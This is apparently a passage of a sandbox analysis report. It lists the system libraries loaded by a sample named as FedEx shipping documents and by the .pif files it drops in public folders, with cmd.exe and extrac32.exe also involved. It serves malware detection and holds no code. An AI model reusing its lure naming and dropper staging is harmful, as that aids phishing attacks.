Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Section loaded: kernel.appcore.dll
